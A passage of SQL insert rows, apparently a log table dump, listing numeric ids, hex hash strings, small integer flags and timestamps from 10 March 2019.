(68591, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 08:53:49'),
(68592, '685c6a381be615901c5c43307347c5db', '32df9845ad8f2736', 0, 2, 1, '2019-03-10 08:55:35'),
(68593, 'cf23c7568929677999eaa8257aed43b5', '383c0bb567e735cd', 0, 2, 1, '2019-03-10 08:55:47'),
(68594, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-10 08:56:30'),
(68595, 'c389e0835214860f4a62a9cb710ebd31', '4313d69e7109f904', 0, 2, 1, '2019-03-10 08:57:25'),
(68596, 'c26d300fb08cb3520601de892bf28e72', '37c6d85bc2eb625e', 0, 2, 1, '2019-03-10 08:57:37'),
(68597, 'cf23c7568929677999eaa8257aed43b5', '383c0bb567e735cd', 0, 2, 1, '2019-03-10 08:57:59'),
(68598, 'ee2b3fd2737b39274db6f006c6cf1973', '96838f2a075a32df', 0, 2, 1, '2019-03-10 08:58:16'),
(68599, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 08:59:06'),
(68600, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-10 09:02:55'),
(68601, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:04:08'),
(68602, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-10 09:05:00'),
(68603, 'a36f15c9d292baa7ec453d65f3d1bd06', '2d8d38e47289d429', 0, 2, 1, '2019-03-10 09:05:45'),
(68604, '313cee22d918cacabe866e4249ab06df', '2ea7201b0e939b00', 0, 2, 1, '2019-03-10 09:07:10'),
(68605, 'a36f15c9d292baa7ec453d65f3d1bd06', '2d8d38e47289d429', 0, 2, 1, '2019-03-10 09:07:50'),
(68606, '43d78105c841f5e4bd4f07b932d62ec3', '792b65fe85ee5963', 0, 2, 1, '2019-03-10 09:07:56'),
(68607, '378875ddf6f70d2be7856c53990018e7', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 09:09:16'),
(68608, 'c7110de3d6fd61ac98898de59b1277ba', '356a2c9913d0de6d', 0, 2, 1, '2019-03-10 09:10:24'),
(68609, 'ee2b3fd2737b39274db6f006c6cf1973', '96838f2a075a32df', 0, 2, 1, '2019-03-10 09:11:48'),
(68610, 'ee2b3fd2737b39274db6f006c6cf1973', '96838f2a075a32df', 0, 2, 1, '2019-03-10 09:12:02'),
(68611, 'd2c911c9b454624bc6bc072262340ba0', '16a202b9761a190a', 0, 2, 1, '2019-03-10 09:13:04'),
(68612, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:14:09'),
(68613, 'bd41ef47edc62ee2d6bff9606174e5fb', 'abc5ec7aefe03208', 0, 2, 1, '2019-03-10 09:14:13'),
(68614, 'b508ae799ba195e2a4bf69069551162d', '00cfdd65313a346b', 0, 2, 1, '2019-03-10 09:14:45'),
(68615, 'f79ac247f18d9f7666befdb55aea978b', '402692e46d0378b1', 0, 2, 1, '2019-03-10 09:14:56'),
(68616, 'b508ae799ba195e2a4bf69069551162d', '00cfdd65313a346b', 0, 2, 1, '2019-03-10 09:15:09'),
(68617, '0874d382b697979ecd239761a0d2199d', 'f657ff0647ad88d0', 0, 2, 1, '2019-03-10 09:15:24'),
(68618, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:15:40'),
(68619, '685c6a381be615901c5c43307347c5db', '32df9845ad8f2736', 0, 2, 1, '2019-03-10 09:16:02'),
(68620, '5e3150b0ef3575c9c54eb6135d57a2f5', '152dd36b7ae63404', 0, 2, 1, '2019-03-10 09:16:11'),
(68621, '1b57c76cc083033ea11726232996c158', '196ae7616c94df27', 0, 2, 1, '2019-03-10 09:16:25'),
(68622, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:19:13'),
(68623, 'a91646b782a9a4eefdadd83b32cdeca9', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-10 09:19:46'),
(68624, 'a91646b782a9a4eefdadd83b32cdeca9', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-10 09:19:58'),
(68625, 'a91646b782a9a4eefdadd83b32cdeca9', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-10 09:20:44'),
(68626, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-10 09:22:05'),
(68627, 'a91646b782a9a4eefdadd83b32cdeca9', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-10 09:23:01'),
(68628, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:26:00'),
(68629, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:31:00'),
(68630, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:32:34'),
(68631, 'a116179cd49706e8f3affb19dd837a7b', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 09:35:27'),
(68632, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:35:34'),
(68633, '313cee22d918cacabe866e4249ab06df', '2ea7201b0e939b00', 0, 2, 1, '2019-03-10 09:36:13'),
(68634, '64ffc1d153ada8204b974ddb9875449d', '147e9e9bf97711fe', 0, 2, 1, '2019-03-10 09:38:32'),
(68635, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:38:35'),
(68636, '311bd6078cd9bc98c334bd89cbfd8376', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 09:39:50'),
(68637, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:40:19'),
(68638, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:42:31'),
(68639, 'd69d0c7d26fedc5ffa689db5e50a074a', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-10 09:42:42'),
(68640, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-10 09:43:26'),
(68641, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-10 09:43:41'),
(68642, '43921460625748bf909917c5c62ee482', 'd57c6a47a6711062', 0, 2, 1, '2019-03-10 09:43:45'),
(68643, 'bbc349dc5091fa3da7c18463dc9146bc', '6455f045eb28d63c', 0, 2, 1, '2019-03-10 09:44:35'),
(68644, '6d88f0271d8b7c7de7a2f1e04642a52c', 'd76d7333a72169c4', 0, 2, 1, '2019-03-10 09:44:47'),
(68645, '6d88f0271d8b7c7de7a2f1e04642a52c', 'd76d7333a72169c4', 0, 2, 1, '2019-03-10 09:45:41'),
(68646, '22b0cded35c4cffcb7147fdd324b0924', '46fb2d44108ef284', 0, 2, 1, '2019-03-10 09:46:58'),
(68647, 'cab6f9df2f81660b148fd2667e574530', '67d9c3341cc72093', 0, 2, 1, '2019-03-10 09:48:21'),
(68648, 'a99240ea2a99ec6e1db6a1abf7c8c508', 'eb4b44444eabdb96', 0, 2, 1, '2019-03-10 09:49:05'),
(68649, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 09:49:39'),
(68650, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-10 09:50:28'),
(68651, 'a30b9110ae8f369882ad104eeb04e423', 'e1f312dd1843e45a', 0, 2, 1, '2019-03-10 09:50:44'),
(68652, '66f3c5c3a79ed4527d60d3487ec15098', '1de090ec808c88cc', 0, 2, 1, '2019-03-10 09:50:56'),
(68653, '685c6a381be615901c5c43307347c5db', '32df9845ad8f2736', 0, 2, 1, '2019-03-10 09:53:40'),
(68654, '685c6a381be615901c5c43307347c5db', '32df9845ad8f2736', 0, 2, 1, '2019-03-10 09:54:00'),
(68655, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:55:41'),
(68656, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 09:56:22'),
(68657, 'd69d0c7d26fedc5ffa689db5e50a074a', 'b3fb8540efdab4b7', 0, 2, 1, '2019-03-10 09:58:28'),
(68658, '5d8c368625c5ec48c685087bdcb67e87', '00369c407644fdc2', 0, 2, 1, '2019-03-10 09:59:40'),
(68659, 'd953b46abcdf7f527d6c95e6383a4c82', '8bf4306b09063bb5', 0, 2, 1, '2019-03-10 10:01:44'),
(68660, 'd953b46abcdf7f527d6c95e6383a4c82', '8bf4306b09063bb5', 0, 2, 1, '2019-03-10 10:03:05'),
(68661, 'd626b09c2f4c752736751b3a127a2302', '546887b39507976e', 0, 2, 1, '2019-03-10 10:03:41'),
(68662, '6a94e0fa2d8a763094c58a716545b4fd', '47cfcac46f1067ae', 0, 2, 1, '2019-03-10 10:03:48'),
(68663, 'cfe2f19b0667cd9bdbc46a0f5d03aa1b', '3ff5f91ea9920066', 0, 2, 1, '2019-03-10 10:05:38'),
(68664, '43921460625748bf909917c5c62ee482', 'd57c6a47a6711062', 0, 2, 1, '2019-03-10 10:07:12'),
(68665, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 10:12:16'),
(68666, 'ec35595629da429c866876007d24594b', '6fe56a3cd549b6ed', 0, 2, 1, '2019-03-10 10:15:57'),
(68667, 'a91646b782a9a4eefdadd83b32cdeca9', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-10 10:16:49'),
(68668, '62d1813c4da4d703f9455f744cd30b1b', '5a6e6fc8df61f23d', 0, 2, 1, '2019-03-10 10:16:56'),
(68669, 'd953b46abcdf7f527d6c95e6383a4c82', '8bf4306b09063bb5', 0, 2, 1, '2019-03-10 10:16:57'),
(68670, 'ea50a7495399adeca43e6dbb89493cad', 'eb856b9786c8f941', 0, 2, 1, '2019-03-10 10:18:58'),
(68671, 'ea50a7495399adeca43e6dbb89493cad', 'eb856b9786c8f941', 0, 2, 1, '2019-03-10 10:19:22'),
(68672, '44dd70b4376cdbdd4be65a1e2eaf29cf', '50d02461c9e1908b', 0, 2, 1, '2019-03-10 10:20:48'),
(68673, '6cb4caabed3feeae23b3fb53be8f202a', 'faf66bc135b0678f', 0, 2, 1, '2019-03-10 10:25:31'),
(68674, '6cb4caabed3feeae23b3fb53be8f202a', 'faf66bc135b0678f', 0, 2, 1, '2019-03-10 10:25:42'),
(68675, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 10:26:11'),
(68676, 'ec30c4e27ec51fa03ca6e39000e6c82f', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 10:29:10'),
(68677, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 10:29:26'),
(68678, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 10:32:56'),
(68679, '6e04c86b5fba9ceb9b0c32c99e649a0f', '854dd24b6beb7284', 0, 2, 1, '2019-03-10 10:33:02'),
(68680, 'ccac2a9ec77b9af057cb8e9dc2964dee', '7d3e015101cab243', 0, 2, 1, '2019-03-10 10:34:05'),
(68681, 'dfa3349703dd06c0b3c76d6f62acc754', 'c646fc7086982b63', 0, 2, 1, '2019-03-10 10:34:17'),
(68682, 'dfa3349703dd06c0b3c76d6f62acc754', 'c646fc7086982b63', 0, 2, 1, '2019-03-10 10:34:36'),
(68683, '3851527cc882b05501b67e8dece98797', '7d3e015101cab243', 0, 2, 1, '2019-03-10 10:35:34'),
(68684, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 10:36:23'),
(68685, 'e0248a4fdb0b017d91cce69dd6cc1be0', 'dee0189c9a93ff94', 0, 2, 1, '2019-03-10 10:36:45'),
(68686, '3851527cc882b05501b67e8dece98797', '7d3e015101cab243', 0, 2, 1, '2019-03-10 10:37:25'),
(68687, '0a7e040d0345108b44ac9691235720e6', '0b797fb53ae15810', 0, 2, 1, '2019-03-10 10:37:48'),
(68688, '5b95e9821e3c994350a9cd19bd40d23a', '22f43a16a511f701', 0, 2, 1, '2019-03-10 10:39:34'),
(68689, '5e2c3da5a987546cdb2a984b453e467f', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-10 10:39:43'),
(68690, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-10 10:43:04'),
(68691, '15e28ae89ac6fb6607316085858af110', 'baa8d16c1a4e5230', 0, 2, 1, '2019-03-10 10:43:10'),
(68692, 'c389e0835214860f4a62a9cb710ebd31', '4313d69e7109f904', 0, 2, 1, '2019-03-10 10:43:13'),
(68693, '59a4cd9c960362d8066d81a792136abc', '63df6d17de2ba967', 0, 2, 1, '2019-03-10 10:43:46'),
(68694, '59a4cd9c960362d8066d81a792136abc', '63df6d17de2ba967', 0, 2, 1, '2019-03-10 10:44:13'),
(68695, '5b95e9821e3c994350a9cd19bd40d23a', '22f43a16a511f701', 0, 2, 1, '2019-03-10 10:45:59'),
(68696, '0066a4f47a2520ab81faa26069b005fa', 'a639f655bef0fc87', 0, 2, 1, '2019-03-10 10:47:04'),
(68697, '4d20775fdacd2d93fde65db203d4e0dc', 'b2bafb74467116e9', 0, 2, 1, '2019-03-10 10:47:12'),
(68698, '5fa039003ab783ce7ae12e1a1d0edbca', 'd09a3a195511f770', 0, 2, 1, '2019-03-10 10:51:29'),
(68699, '5fa039003ab783ce7ae12e1a1d0edbca', 'd09a3a195511f770', 0, 2, 1, '2019-03-10 10:51:41'),
(68700, '5fa039003ab783ce7ae12e1a1d0edbca', 'd09a3a195511f770', 0, 2, 1, '2019-03-10 10:52:31'),
(68701, '6ef0bd6eb71c95178e4a97153d364db2', 'c1e9007c175ad288', 0, 2, 1, '2019-03-10 10:52:44'),
(68702, '9ce2d54d1632ca0c848baab255c23cad', 'f8868cadb34bea20', 0, 2, 1, '2019-03-10 10:56:47'),
(68703, 'ec30c4e27ec51fa03ca6e39000e6c82f', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 10:58:22'),
(68704, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 11:04:42'),
(68705, 'a1ff556eaceb908fee502965d25a3072', '332723ec6654d9f5', 0, 2, 1, '2019-03-10 11:10:09'),
(68706, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 11:13:00'),
(68707, '0a849f8427702c64d2a7438559dfeb6c', 'eb4b44444eabdb96', 0, 2, 1, '2019-03-10 11:16:47'),
(68708, '3851527cc882b05501b67e8dece98797', '7d3e015101cab243', 0, 2, 1, '2019-03-10 11:20:29'),
(68709, '3000b4a54fb178457e2025f8322220c8', '4cf86956d0b65c81', 0, 2, 1, '2019-03-10 11:21:46'),
(68710, '276c4f7b45a5f21a82febbf161bac89e', 'eb856b9786c8f941', 0, 2, 1, '2019-03-10 11:24:39'),
(68711, 'f6e0b41e3599b8f089b49dba2110f69e', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-10 11:25:30'),
(68712, 'e731f9e7ca300099e53074103b245310', 'bde3bf313d286518', 0, 2, 1, '2019-03-10 11:25:43'),
(68713, '0874d382b697979ecd239761a0d2199d', 'f657ff0647ad88d0', 0, 2, 1, '2019-03-10 11:25:55'),
(68714, '9b7dcdc50f411a622cdb678f3d2448a7', 'e282d8270613389a', 0, 2, 1, '2019-03-10 11:26:38'),
(68715, '3d1b78b3baf21c85113fefa148649e19', 'f5ea342846f5c547', 0, 2, 1, '2019-03-10 11:29:31'),
(68716, '3d1b78b3baf21c85113fefa148649e19', 'f5ea342846f5c547', 0, 2, 1, '2019-03-10 11:29:47'),
(68717, 'b9d0dd1fc41570aad27a5223cc38d494', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 11:30:51'),
(68718, '3000b4a54fb178457e2025f8322220c8', '4cf86956d0b65c81', 0, 2, 1, '2019-03-10 11:42:56'),
(68719, '276c4f7b45a5f21a82febbf161bac89e', 'eb856b9786c8f941', 0, 2, 1, '2019-03-10 11:44:38'),
(68720, '2be2417e08691b00b4b15bd5fd3275ce', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-10 11:50:22'),
(68721, '9b7dcdc50f411a622cdb678f3d2448a7', 'e282d8270613389a', 0, 2, 1, '2019-03-10 11:52:08'),
(68722, '9b7dcdc50f411a622cdb678f3d2448a7', 'e282d8270613389a', 0, 2, 1, '2019-03-10 11:52:28'),
(68723, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 11:53:31'),
(68724, 'baa7912b30996e86c9ed7d9cba1e47d3', 'd1c27eb4adc98518', 0, 2, 1, '2019-03-10 11:59:00'),
(68725, 'e0bcf7a55ae9c5e0b1643dbd87b61b64', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-10 11:59:43'),
(68726, '8e2b55d9efa9a701f0b82fd039cd9fb1', 'ed9eb867b7d24567', 0, 2, 1, '2019-03-10 12:00:56'),
(68727, 'a1ff556eaceb908fee502965d25a3072', '332723ec6654d9f5', 0, 2, 1, '2019-03-10 12:01:05'),
(68728, '8e2b55d9efa9a701f0b82fd039cd9fb1', 'ed9eb867b7d24567', 0, 2, 1, '2019-03-10 12:01:14'),
(68729, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-10 12:02:39'),
(68730, '33e9a9a6a59dfaeed028d83ce25d6b42', '8bf4306b09063bb5', 0, 2, 1, '2019-03-10 12:04:05'),
(68731, 'e0bcf7a55ae9c5e0b1643dbd87b61b64', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-10 12:09:07'),
(68732, 'e0bcf7a55ae9c5e0b1643dbd87b61b64', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-10 12:09:13'),
(68733, 'e0bcf7a55ae9c5e0b1643dbd87b61b64', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-10 12:09:27'),
(68734, 'e0bcf7a55ae9c5e0b1643dbd87b61b64', 'ac7a40dcd48698a1', 0, 2, 1, '2019-03-10 12:09:45'),
(68735, 'ffa08262c10f45806840c2eeab1deb5d', '0530018377078939', 0, 2, 1, '2019-03-10 12:10:12'),
(68736, '5b95e9821e3c994350a9cd19bd40d23a', '22f43a16a511f701', 0, 2, 1, '2019-03-10 12:11:39'),
(68737, '5b95e9821e3c994350a9cd19bd40d23a', '22f43a16a511f701', 0, 2, 1, '2019-03-10 12:11:54'),
(68738, 'd626b09c2f4c752736751b3a127a2302', '546887b39507976e', 0, 2, 1, '2019-03-10 12:14:09'),
(68739, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 12:19:18'),
(68740, 'e5ed8146236cc3f55ee9c9104944da87', 'b2b4f7fec130ee46', 0, 2, 1, '2019-03-10 12:28:26'),
(68741, 'ac736a4fb3bdc99ed0b5d506caf469dc', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 12:33:08'),
(68742, 'f4c18df39262006eac52bb4b7321901b', '3aed1f8e457865fb', 0, 2, 1, '2019-03-10 12:33:24'),
(68743, '1ca2bcc4f93fabdfd6617939dd275fd9', '1c68b977b911188c', 0, 2, 1, '2019-03-10 12:36:05'),
(68744, 'defe9544ade6bd2701365a12c844086a', '3313b38bfbe72b6e', 0, 2, 1, '2019-03-10 12:37:47'),
(68745, '8ebcb7b0eb908828d1298a6ec6182c16', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-10 12:39:12'),
(68746, '8ebcb7b0eb908828d1298a6ec6182c16', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-10 12:39:24'),
(68747, '8ebcb7b0eb908828d1298a6ec6182c16', 'b9ec4d3aacab433b', 0, 2, 1, '2019-03-10 12:40:07'),
(68748, 'd83df6b2b3e3c117179df63b49f43371', 'cd17c20fd4b74953', 0, 2, 1, '2019-03-10 12:43:58'),
(68749, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 12:44:13'),
(68750, '99247e254902d9a5fdb997610cb38b9b', '951699ae4759981e', 0, 2, 1, '2019-03-10 12:46:31'),
(68751, '7ff76985ae5b62c881eab19b49ad735e', '7322991e74a44287', 0, 2, 1, '2019-03-10 12:49:24'),
(68752, '8f7c97729b26825380a3f0d1bc084439', '24bc61993a7947f8', 0, 2, 1, '2019-03-10 12:49:49'),
(68753, '2b26f1791e98cc71571ecee6e6b5a9df', '27d94d188ebeb4d9', 0, 2, 1, '2019-03-10 12:51:51'),
(68754, '2b06787d3d680d7569ec6f38b6e9e6df', '64a658fbde059399', 0, 2, 1, '2019-03-10 12:51:56'),
(68755, '6e04c86b5fba9ceb9b0c32c99e649a0f', '854dd24b6beb7284', 0, 2, 1, '2019-03-10 12:52:12'),
(68756, '22b0cded35c4cffcb7147fdd324b0924', '46fb2d44108ef284', 0, 2, 1, '2019-03-10 12:53:24'),
(68757, 'ac736a4fb3bdc99ed0b5d506caf469dc', '8b5aec38d6bfc430', 0, 2, 1, '2019-03-10 12:55:03'),
(68758, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-10 12:58:44'),
(68759, '4f337d140d25bd72dd726c26f6fb7543', 'ad349afa72dc0ac7', 0, 2, 1, '2019-03-10 13:02:47'),
(68760, '4ecb532bfd8150f13a7c7a1e1dfca5f4', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-03-10 13:03:04'),
(68761, '4ecb532bfd8150f13a7c7a1e1dfca5f4', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-03-10 13:03:17'),
(68762, 'd83df6b2b3e3c117179df63b49f43371', 'cd17c20fd4b74953', 0, 2, 1, '2019-03-10 13:06:51'),
(68763, 'f117012dc10dea4954df98b0cdb53ffd', 'e50451d6d332bac5', 0, 2, 1, '2019-03-10 13:07:18'),
(68764, 'd83df6b2b3e3c117179df63b49f43371', 'cd17c20fd4b74953', 0, 2, 1, '2019-03-10 13:09:11'),
(68765, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 13:10:49'),
(68766, 'e0248a4fdb0b017d91cce69dd6cc1be0', 'dee0189c9a93ff94', 0, 2, 1, '2019-03-10 13:11:09'),
(68767, '6ea30f891c6c3ff4526d09ef9324be69', 'bfd9fe0eae4c9f18', 0, 2, 1, '2019-03-10 13:11:37'),
(68768, 'd83df6b2b3e3c117179df63b49f43371', 'cd17c20fd4b74953', 0, 2, 1, '2019-03-10 13:11:54'),
(68769, '26bb194a1d4e384bdff7e6d5a94f45ad', '407198c79af506a8', 0, 2, 1, '2019-03-10 13:15:22'),
(68770, '8409300bc2755ff61ddc5c3170f5722f', 'f8f70c95a9dd1c3e', 0, 2, 1, '2019-03-10 13:18:16'),
(68771, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:20:17'),
(68772, 'e5c3edb5989f4283aacacc739948907a', '55a15e401e20d7b6', 0, 2, 1, '2019-03-10 13:24:38'),
(68773, 'e5c3edb5989f4283aacacc739948907a', '55a15e401e20d7b6', 0, 2, 1, '2019-03-10 13:25:33'),
(68774, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-10 13:25:50'),
(68775, 'e5c3edb5989f4283aacacc739948907a', '55a15e401e20d7b6', 0, 2, 1, '2019-03-10 13:26:23'),
(68776, 'b54468d4ca6d0ba54ff0980fbe857f94', '27af34bd055b3492', 0, 2, 1, '2019-03-10 13:29:14'),
(68777, 'b54468d4ca6d0ba54ff0980fbe857f94', '27af34bd055b3492', 0, 2, 1, '2019-03-10 13:29:42'),
(68778, 'b54468d4ca6d0ba54ff0980fbe857f94', '27af34bd055b3492', 0, 2, 1, '2019-03-10 13:30:08'),
(68779, 'b54468d4ca6d0ba54ff0980fbe857f94', '27af34bd055b3492', 0, 2, 1, '2019-03-10 13:31:07'),
(68780, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 13:32:43'),
(68781, 'fa0765a151cb8581b80b5eab76dfae4f', '2ea7201b0e939b00', 0, 2, 1, '2019-03-10 13:33:15'),
(68782, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-10 13:34:22'),
(68783, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:34:37'),
(68784, 'a1ff556eaceb908fee502965d25a3072', '332723ec6654d9f5', 0, 2, 1, '2019-03-10 13:34:42'),
(68785, 'a1ff556eaceb908fee502965d25a3072', '332723ec6654d9f5', 0, 2, 1, '2019-03-10 13:35:02'),
(68786, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:35:25'),
(68787, '1ca2bcc4f93fabdfd6617939dd275fd9', '1c68b977b911188c', 0, 2, 1, '2019-03-10 13:35:54'),
(68788, '9a3e6b8d523c14e71142c8cc7ad7954b', 'fae51c31b385b3e8', 0, 2, 1, '2019-03-10 13:36:13'),
(68789, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:36:36'),
(68790, 'a932f2ecd1c52735652500e862689cad', 'f416d68f97fd05d9', 0, 2, 1, '2019-03-10 13:36:40'),
(68791, '1ca2bcc4f93fabdfd6617939dd275fd9', '1c68b977b911188c', 0, 2, 1, '2019-03-10 13:36:45'),
(68792, '7f7d787d9af35165fc4c03bb6d880a26', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-10 13:36:49'),
(68793, '145431abd374e33960f0a33ebe611455', '74aba437eea39f30', 0, 2, 1, '2019-03-10 13:37:04'),
(68794, 'a932f2ecd1c52735652500e862689cad', 'f416d68f97fd05d9', 0, 2, 1, '2019-03-10 13:37:10'),
(68795, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:37:19'),
(68796, 'a932f2ecd1c52735652500e862689cad', 'f416d68f97fd05d9', 0, 2, 1, '2019-03-10 13:37:40'),
(68797, 'a932f2ecd1c52735652500e862689cad', 'f416d68f97fd05d9', 0, 2, 1, '2019-03-10 13:38:29'),
(68798, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-10 13:38:36'),
(68799, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:39:00'),
(68800, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:39:14'),
(68801, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:39:35'),
(68802, '59a4cd9c960362d8066d81a792136abc', '63df6d17de2ba967', 0, 2, 1, '2019-03-10 13:39:59'),
(68803, 'fa0765a151cb8581b80b5eab76dfae4f', '2ea7201b0e939b00', 0, 2, 1, '2019-03-10 13:40:37'),
(68804, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:40:45'),
(68805, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:41:13'),
(68806, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:41:44'),
(68807, 'bba1ffbf8368fc898fc9e2f0ce206ad9', 'abc5ec7aefe03208', 0, 2, 1, '2019-03-10 13:42:03'),
(68808, '0d707c74a9dce41a94dbc95f39b3c541', '375fc0d5f46caa97', 0, 2, 1, '2019-03-10 13:42:17'),
(68809, '59a4cd9c960362d8066d81a792136abc', '63df6d17de2ba967', 0, 2, 1, '2019-03-10 13:42:29'),
(68810, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:42:56'),
(68811, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:43:17'),
(68812, '59a4cd9c960362d8066d81a792136abc', '63df6d17de2ba967', 0, 2, 1, '2019-03-10 13:43:45'),
(68813, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-10 13:43:51'),
(68814, '1226d7325b504162f0437d372666c1d2', 'a4606350cb27c277', 0, 2, 1, '2019-03-10 13:45:16'),
(68815, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-10 13:46:38'),
(68816, '2cecb95b591ec38e7b5208a74772d5c0', '4df0bbb8cabe1372', 0, 2, 1, '2019-03-10 13:47:25'),
(68817, '44dd70b4376cdbdd4be65a1e2eaf29cf', '50d02461c9e1908b', 0, 2, 1, '2019-03-10 13:48:42'),
(68818, '0066a4f47a2520ab81faa26069b005fa', 'a639f655bef0fc87', 0, 2, 1, '2019-03-10 13:49:09'),
(68819, '44dd70b4376cdbdd4be65a1e2eaf29cf', '50d02461c9e1908b', 0, 2, 1, '2019-03-10 13:49:39'),
